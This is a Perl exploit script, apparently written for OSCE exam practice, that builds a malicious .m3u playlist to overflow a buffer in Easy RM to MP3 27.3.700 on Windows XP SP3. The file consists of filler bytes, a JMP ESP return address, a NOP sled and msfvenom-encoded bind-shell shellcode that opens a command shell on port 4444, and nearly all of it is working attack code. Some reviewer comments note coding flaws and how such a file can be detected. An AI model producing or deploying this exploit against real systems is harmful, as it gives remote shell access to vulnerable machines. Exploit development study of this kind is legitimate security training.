#
# Exploit for Easy RM to MP3 27.3.700 vulnerability, discovered by Crazy_Hacker
# Written by BaffledJimmy as part of OSCE Prep
# https://www.tommacdonald.co.uk
#
# Tested on Windows XP SP3 (English) 32bit
#
#
#
# Name of the crafted playlist file written at the end of the script.
my $file= "BindPOC.m3u";
# 26104-byte filler; everything before the value that lands in $eip.
my $junk= "A" x 26104;
# Packed little-endian ('V') 32-bit address; the trailing comment records
# where the author took it from (a JMP ESP in the codec2 module).
my $eip = pack('V',0x01aaf23a); #JMP ESP from codec2
# 25 x 0x90 (x86 NOP) placed ahead of the encoded payload.
my $shellcode = "\x90" x 25;
# 144 bytes
# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh -e x86/shikata_ga_nai --smallest -f perl -b '\x00\x0a'
$shellcode = $shellcode . "\xbe\xb9\xe4\xe7\xbb\xdb\xc3\xd9\x74\x24\xf4\x5a\x29\xc9" .
"\xb1\x53\x83\xea\xfc\x31\x72\x0e\x03\xcb\xea\x05\x4e\xd7" .
"\x1b\x4b\xb1\x27\xdc\x2c\x3b\xc2\xed\x6c\x5f\x87\x5e\x5d" .
"\x2b\xc5\x52\x16\x79\xfd\xe1\x5a\x56\xf2\x42\xd0\x80\x3d" .
"\x52\x49\xf0\x5c\xd0\x90\x25\xbe\xe9\x5a\x38\xbf\x2e\x86" .
"\xb1\xed\xe7\xcc\x64\x01\x83\x99\xb4\xaa\xdf\x0c\xbd\x4f" .
"\x97\x2f\xec\xde\xa3\x69\x2e\xe1\x60\x02\x67\xf9\x65\x2f" .
"\x31\x72\x5d\xdb\xc0\x52\xaf\x24\x6e\x9b\x1f\xd7\x6e\xdc" .
"\x98\x08\x05\x14\xdb\xb5\x1e\xe3\xa1\x61\xaa\xf7\x02\xe1" .
"\x0c\xd3\xb3\x26\xca\x90\xb8\x83\x98\xfe\xdc\x12\x4c\x75" .
"\xd8\x9f\x73\x59\x68\xdb\x57\x7d\x30\xbf\xf6\x24\x9c\x6e" .
"\x06\x36\x7f\xce\xa2\x3d\x92\x1b\xdf\x1c\xfb\xe8\xd2\x9e" .
"\xfb\x66\x64\xed\xc9\x29\xde\x79\x62\xa1\xf8\x7e\x85\x98" .
"\xbd\x10\x78\x23\xbe\x39\xbf\x77\xee\x51\x16\xf8\x65\xa1" .
"\x97\x2d\x13\xa9\x3e\x9e\x06\x54\x80\x4e\x87\xf6\x69\x85" .
"\x08\x29\x89\xa6\xc2\x42\x22\x5b\xed\x7d\xef\xd2\x0b\x17" .
"\x1f\xb3\x84\x8f\xdd\xe0\x1c\x28\x1d\xc3\x34\xde\x56\x05" .
"\x82\xe1\x66\x03\xa4\x75\xed\x40\x70\x64\xf2\x4c\xd0\xf1" .
"\x65\x1a\xb1\xb0\x14\x1b\x98\x22\xb4\x8e\x47\xb2\xb3\xb2" .
"\xdf\xe5\x94\x05\x16\x63\x09\x3f\x80\x91\xd0\xd9\xeb\x11" .
"\x0f\x1a\xf5\x98\xc2\x26\xd1\x8a\x1a\xa6\x5d\xfe\xf2\xf1" .
"\x0b\xa8\xb4\xab\xfd\x02\x6f\x07\x54\xc2\xf6\x6b\x67\x94" .
"\xf6\xa1\x11\x78\x46\x1c\x64\x87\x67\xc8\x60\xf0\x95\x68" .
"\x8e\x2b\x1e\x96\x7e\xe1\x8b\x0f\xd9\x90\xf1\x4d\xda\x4f" .
"\x35\x68\x59\x65\xc6\x8f\x41\x0c\xc3\xd4\xc5\xfd\xb9\x45" .
"\xa0\x01\x6d\x65\xe1";
# NOTE(review): two-argument open with an interpolated filename, no error
# check, and $FILE is an undeclared package global (the file has no
# `use strict; use warnings;`). If the open fails, print/close fail silently
# and the "success" line below is still printed.
open($FILE,">$file");
# Written as one unterminated line: 26104 + 4 + 25 + 144 = 26277 bytes.
# Defensive note: a .m3u of this size consisting almost entirely of 'A'
# bytes with no newline is trivially distinguishable from a real playlist.
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";